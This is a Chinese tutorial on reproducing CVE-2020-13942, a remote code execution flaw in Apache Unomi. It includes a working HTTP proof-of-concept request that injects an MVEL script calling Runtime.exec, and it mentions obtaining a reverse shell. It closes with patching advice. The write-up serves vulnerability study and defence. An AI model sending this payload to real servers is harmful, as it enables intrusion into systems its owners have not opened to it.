溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Apache Unomi 遠程代碼執(zhí)行漏洞CVE -2020-13942如何復現(xiàn)

發(fā)布時間:2021-12-29 15:34:49 來源:億速云 閱讀:129 作者:柒染 欄目:安全技術

Apache Unomi 遠程代碼執(zhí)行漏洞CVE -2020-13942如何復現(xiàn),很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

CVE -2020-13942 (Apache Unomi 遠程代碼執(zhí)行漏洞)

一、漏洞描述:

Apache Unomi是一個Java開源平臺,這是一個Java服務器,旨在管理,潛在顧客和訪問者的數(shù)據(jù),并幫助個性化體驗。Unomi可用于在非常不同的系統(tǒng)(例如CMS,CRM,問題跟蹤器,本機移動應用程序等)中集成個性化和配置文件管理。

在Apache Unomi 1.5.1版本之前,攻擊者可以通過精心構造的MVEL或ONGl表達式來發(fā)送惡意請求,使得Unomi服務器執(zhí)行任意代碼,漏洞對應編號為CVE-2020-11975,而CVE-2020-13942漏洞是對CVE-2020-11975漏洞的補丁繞過,攻擊者繞過補丁檢測的黑名單,發(fā)送惡意請求,在服務器執(zhí)行任意代碼。

二、影響版本:

Apache Unomi < 1.5.2

三、漏洞復現(xiàn):

訪問頁面樣式

Apache Unomi 遠程代碼執(zhí)行漏洞CVE -2020-13942如何復現(xiàn)

POC:

POST/context.jsonHTTP/1.1Host: localhost:8181User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0Content-Length: 486{"filters": [ {"id":"boom","filters": [ {"condition": {"parameterValues": {"":"script::Runtime r = Runtime.getRuntime(); r.exec(\"gnome-calculator\");" },"type":"profilePropertyCondition" } } ] } ],"sessionId":"boom"}

抓包poc執(zhí)行:

Apache Unomi 遠程代碼執(zhí)行漏洞CVE -2020-13942如何復現(xiàn)

查看DNSlog記錄:

Apache Unomi 遠程代碼執(zhí)行漏洞CVE -2020-13942如何復現(xiàn)

嘗試反彈shell:

Apache Unomi 遠程代碼執(zhí)行漏洞CVE -2020-13942如何復現(xiàn)

執(zhí)行反彈shell命令腳本:

獲取shell

Apache Unomi 遠程代碼執(zhí)行漏洞CVE -2020-13942如何復現(xiàn)

四、修復方案

1、盡可能避免將用戶數(shù)據(jù)放入表達式解釋器中。

2、目前廠商已發(fā)布最新版本,請受影響用戶及時下載并更新至最新版本。官方鏈接如下:

看完上述內(nèi)容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業(yè)資訊頻道,感謝您對億速云的支持。

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權內(nèi)容。

AI